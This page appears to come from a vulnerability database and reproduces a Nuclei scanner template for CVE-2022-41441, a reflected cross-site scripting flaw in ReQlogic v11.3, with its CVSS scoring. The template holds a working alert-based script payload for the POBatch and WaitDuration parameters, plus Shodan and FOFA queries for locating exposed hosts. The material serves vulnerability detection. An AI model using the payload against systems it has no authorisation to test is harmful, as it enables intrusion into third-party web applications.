Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-41441
HistoryApr 21, 2023 - 8:56 a.m.

ReQlogic v11.3 - Cross Site Scripting

2023-04-2108:56:01
ProjectDiscovery
github.com
4
cve
cve2022
packetstorm
xss
reqlogic
web
script
html
vulnerability
patch

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

52.9%

ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.
id: CVE-2022-41441

info:
  name: ReQlogic v11.3 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogic v11.3.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-41441
    - https://okankurtulus.com.tr/2023/01/17/reqlogic-v11-3-unauthenticated-reflected-cross-site-scripting-xss/
    - http://packetstormsecurity.com/files/171557/ReQlogic-11.3-Cross-Site-Scripting.html
    - http://reqlogic.com
    - https://reqlogic.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-41441
    cwe-id: CWE-79
    epss-score: 0.00155
    epss-percentile: 0.5093
    cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: reqlogic
    product: reqlogic
    shodan-query:
      - http.html:"ReQlogic"
      - http.html:"reqlogic"
    fofa-query: body="reqlogic"
  tags: cve,cve2022,packetstorm,xss,reqlogic

http:
  - method: GET
    path:
      - "{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script>"
      - "{{BaseURL}}/ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3"

    stop-at-first-match: true
    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body_2, "<script>alert(document.domain)</script>") && contains(body_2, "POProcessTimeout")'
        condition: and
# digest: 4b0a00483046022100a173d3995f2152103e548a47c77d0cef7aacccaa3eb5449ff74d74f257519c8c022100c607b094a88a70882478992ab5bdef4034eb3eb55adc8c61189596a919342268:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

52.9%

Related for NUCLEI:CVE-2022-41441